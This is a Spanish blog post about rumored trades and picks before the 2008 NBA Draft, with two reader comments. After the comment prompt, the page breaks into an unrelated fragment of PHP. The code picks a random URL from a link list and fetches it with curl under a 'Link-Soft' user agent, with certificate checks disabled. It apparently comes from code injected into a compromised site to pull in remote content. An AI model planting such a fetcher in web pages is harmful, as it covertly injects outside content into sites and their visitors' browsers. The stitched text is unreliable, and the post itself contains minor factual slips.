¡Que viene el Draft!

26 de June de 2008 por txusma

Quedan muy pocas horas para que este noche se celebre en New York el Draft de la NBA y todo está ya preparado para la ceremonia. Los rumores de traspasos y elecciones siguen apareciendo hasta última hora e incluso ya se han confirmado los primeros: Los Portland Trail Blazers se han hecho con el número 27 del draft que correspondía a los New Hornets a cambio de dinero y los Charlotte Bobcats (que ya disponían de la novena elección) con el número 20 de los Denver Nuggets a cambio de una primera ronda futura. Los Blazers parecen haber pensado en Ante Tomic y los Bobcats en Roy Hibbert al efectuar estos traspasos. Por otro lado también parece confirmado (aunque no se hará público hasta el 9 de Julio) un traspaso que llevará a Jermaine O’Neal a Toronto a cambio de TJ Ford, Rasho Nesterovic y la elección 17 (con la que los Pacers podrían draftear a Robin López o Kosta Koufos). Es sin duda una fantástica noticia para José Manuel Calderón.

Un vistazo a los rumores

  • Viendo el apartado de rumores podemos confirmar que los Blazers pueden ser uno de los grandes animadores de la noche. Se especula con la posibilidad que traspasen a Jarret Jack más el número 13 a los Nets a cambio de Marcus Williams y su elección número 10. Con esta elección intentarían conseguir a Russell Westbrook o Jerryd Bayless pero lo más normal es que se tuvieran que conformar con Eric Gordon o DJ Augustine.
  • Parece confirmado que Derrick Rose será elegido con el número 1 por los Chicago Bulls.
  • A su vez todo el mundo parece tener claro que los Milwaukee Bucks elegirán a Joe Alexander en la octava elección.
  • La gran duda ahora mismo es saber a quién elegirán los Wolves con el número 3. Unas fuentes apuntan a OJ Mayo y otras a Kevin Love.
  • Los Knicks estarían intentando avanzar algunas posiciones para elegir a OJ Mayo y para ello parece ser que están en conversaciones con Memphis Grizzlies y Minnessota Timberwolves. En el trade con los Grizzlies la franquicia canadiense podría hacerse con los servicios de David Lee y Malik Rose a cambio de Brian Cardinal y la susodicha elección.
  • Las conversaciones entre Cleveland y Milwaukee por el traspaso de Michael Redd parece que van en serio. Milwaukee podría recibir, entre otras cosas, a Anderson Varejao y Daniel Gibson.
  • Se habla también de un trade entre los Grizzlies y los Heats que podría llevar al número 2 del draft a Memphis a cambio del número 5, Kyle Lowry y Mike Miller.
Comenta

2 comentarios a esta entrada

  1. Dantley dice:
    #1

    Portland a lo suyo, sacando rondas. Me encanta esa filosofía que están marcando en los últimos años.

    El tema de Indiana con TJ Ford altera bastante las elecciones. Buscarán ahora un grande, pero seguramente dejará a Augustin libre para los que vengan detrás

      Citar

  2. Viva_Dirk dice:
    #2

    Los Wolves no creo que deban moverse. OJ Mayo es ideal para ellos, ya que parece que Lopez ha bajado mucho, pero Foye-Mayo-Brewer-Smith-Jefferson puede ser un buen comienzo si tienen paciencia.

    Y tremendo lo de Portland, por fin un General Manager que sabe lo que hace, le salga mal o bien pero tiene un plan, parece un profesional y todo, jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>